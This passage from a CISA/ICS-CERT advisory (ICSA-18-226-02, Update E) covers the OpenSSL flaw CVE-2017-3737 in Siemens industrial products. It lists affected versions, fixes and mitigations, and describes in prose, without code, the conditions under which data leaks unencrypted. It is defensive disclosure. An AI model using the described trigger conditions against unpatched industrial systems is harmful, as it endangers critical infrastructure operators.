Products (Update D) that was published February 12, 2019, on the NCCIC/ICS-CERT website.\n\n## 3\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could result in unencrypted data being transmitted by the SSL/TLS record layer.\n\n## 4\\. 
TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nSiemens reports that the vulnerability affects the following industrial products:\n\n * MindConnect IoT2040: All versions prior to v03.01\n * MindConnect Nano (IPC227D): All versions prior to v03.01\n * SIMATIC ET 200SP Open Controller CPU 1515SP PC: All versions prior to v2.1.6\n * SIMATIC HMI WinCC Flexible: All versions prior to v15.1\n * SIMATIC IPC DiagMonitor: All versions prior to v5.0.3\n\n** \\--------- Begin Update E Part 1 of 4 ---------**\n\n * SIMATIC IPC DiagBase: All versions prior to v2.1.1.0 \n\n**\\--------- End Update E Part 1 of 4 ---------**\n\n * SIMATIC S7-1200: All versions prior to v4.2.3\n * SIMATIC STEP 7 (TIA Portal) v13: All versions prior to v13 SP2 Update 2\n * SIMATIC STEP 7 (TIA Portal) v14: All versions\n * SIMATIC STEP 7 (TIA Portal) v15: All versions prior to v15 SP2 Update 2\n * SIMATIC WinCC (TIA Portal) v13: All versions prior to v13 SP2 Update 2\n\n**\\--------- Begin Update E Part 2 of 4 ---------**\n\n * SIMATIC WinCC (TIA Portal) v14: All versions prior to v14 SP1 Update 6\n\n**\\--------- End Update E Part 2 of 4 ---------**\n\n * SIMATIC WinCC (TIA Portal) v15: All versions prior to v15 SP2 Update 2\n * SIMATIC S7-1500: All versions prior to v2.5.2\n * SIMATIC S7-1500 Software Controller: All versions prior to v2.6\n * SIMATIC WinCC OA v3.14: All versions\n * SIMATIC WinCC OA v3.15: All versions\n * SIMATIC WinCC OA v3.16: All versions\n * SINUMERIK Integrate Access MyMachine service engineer client as part of Sinumerik Integrate Product suite: All versions prior to and including v4.1.7, and\n * SINUMERIK Integrate Operate Client as part of Sinumerik Integrate Product suite: All versions prior to and including v2.0.11 / v3.0.11\n\n### 4.2 VULNERABILITY OVERVIEW\n\n**4.2.1 [CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION CWE-319](<https://cwe.mitre.org/data/definitions/319.html>)**\n\nIn OpenSSL 1.0.2 an \u201cerror state\u201d mechanism was introduced. 
This \u201cerror state\u201d mechanism does not work correctly if SSL_read() or SSL_write() is called directly by an application. This could result in data being sent out unencrypted by the SSL/TLS record layer. \n \nSuccessful exploitation requires an attacker to cause a fatal error in the targeted SSL/TLS handshake algorithm, and that the targeted application calls SSL_read() or SSL_write() only after receiving the fatal error. No user interaction or privileges are required to exploit this security vulnerability. The vulnerability could allow a compromise of data confidentiality by transmitting it unencrypted over the network. \n \n[CVE-2017-3737](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3737>) has been assigned to this vulnerability. A CVSS v3 base score of 5.9 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS**: Chemical, Critical Manufacturing, Energy, Food and Agriculture, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED**: Worldwide\n * **COMPANY HEADQUARTERS LOCATION**: Germany\n\n### 4.4 RESEARCHER\n\nSiemens reported this vulnerability to NCCIC.\n\n## 5\\. 
MITIGATIONS\n\nSiemens has provided updates for the following products to fix the vulnerability:\n\n * MindConnect IoT2040: Install v03.01 or newer via Mindsphere web front-end\n * MindConnect Nano (IPC227D): Install v03.01 or newer via Mindsphere web front-end\n * SIMATIC ET 200SP Open Controller CPU 1515SP PC: Update to v2.1.6\n\n<https://support.industry.siemens.com/cs/us/en/view/109759122>\n\n * SIMATIC HMI WinCC Flexible: Update to v15.1\n\n<https://support.industry.siemens.com/cs/us/en/view/109758794>\n\n * SIMATIC IPC DiagMonitor: Update to v5.0.3\n\nContact customer support to obtain the update\n\n**\\--------- Begin Update E Part 3 of 4 ---------**\n\n * SIMATIC IPC DiagBase: Update to version v2.1.1.0\n\n<https://support.industry.siemens.com/cs/ww/en/view/29316343>\n\n**\\--------- End Update E Part 3 of 4 ---------**\n\n * SIMATIC S7-1500: Update to v2.5.2\n\n<https://support.industry.siemens.com/cs/ww/en/view/109478459>\n\n * SIMATIC S7-1500 Software Controller: Update to v2.6\n\n<https://support.industry.siemens.com/cs/us/en/view/109478528>\n\n * SIMATIC STEP 7 (TIA Portal) v13 and WinCC (TIA Portal) v13: Update to v13 Update 2 or newer\n\n<https://support.industry.siemens.com/cs/ww/en/view/109759753>\n\n**\\--------- Begin Update E Part 4 of 4 ---------**\n\n * SIMATIC WinCC (TIA Portal) v14: Update to v14 SP1 Update 6\n\n<https://support.industry.siemens.com/cs/ww/en/view/109747387>\n\n**\\--------- End Update E Part 4 of 4 ---------**\n\n * SIMATIC STEP 7 (TIA Portal) v15 and WinCC (TIA Portal) v15: Update to v15 Update 2 or newer\n\n<https://support.industry.siemens.com/cs/ww/en/view/109755826>\n\n * SIMATIC S7-1200: Update to v4.2.3 \n\n<https://support.industry.siemens.com/cs/ww/en/view/109741461>\n\n * SIMATIC WinCC OA V3.14: Update to v3.14-P021\n\n * SIMATIC WinCC OA V3.15: Update to v3.15-P014\n\n * SIMATIC WinCC OA V3.16: Update to v3.16-P002\n\n[https://portal.etm.at/index.php?option=com_content&view=category&id=67&layout=blog&Itemid=80](<https://portal.etm.at/index.php?option=com_content&view=category&id=67&layout=blog&Itemid=80>)\n\n * SINUMERIK Integrate Access MyMachine service engineer client as part of Sinumerik Integrate Product suite: Update to v4.1.8\n * SINUMERIK Integrate Operate Client as part of Sinumerik Integrate Product suite: Update to v2.0.12 / v3.0.12\n\nSiemens has identified the following specific workarounds and mitigations users can apply to reduce the risk:\n\n * S7-1200: Disable web server within the device configuration if it is not used, or limit access to the web server on a particular Ethernet/PROFINET port/interface if possible (setting is under General /Web server access).\n\nAs a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens\u2019 operational guidelines for Industrial Security (Download: <https://www.siemens.com/cert/operational-guidelines-industrial-security>), following the recommendations in the product manuals. \n \nAdditional information on Industrial Security by Siemens can be found at:\n\n<https://www.siemens.com/industrialsecurity> \n \nFor more information on this vulnerability and associated software updates, please see Siemens security advisory SSA-179516 on their website: \n \n<https://www.siemens.com/cert/advisories>\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. 
Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability. High skill level is needed to exploit.\n\n## Contact Information\n\nFor any questions related to this report, please contact CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
", "edition": 23, "modified": "2019-04-09T00:00:00", "published": "2018-08-14T00:00:00", "id": "ICSA-18-226-02", "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-226-02", "title": "Siemens OpenSSL Vulnerability in Industrial Products (Update E)", "type": "ics", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}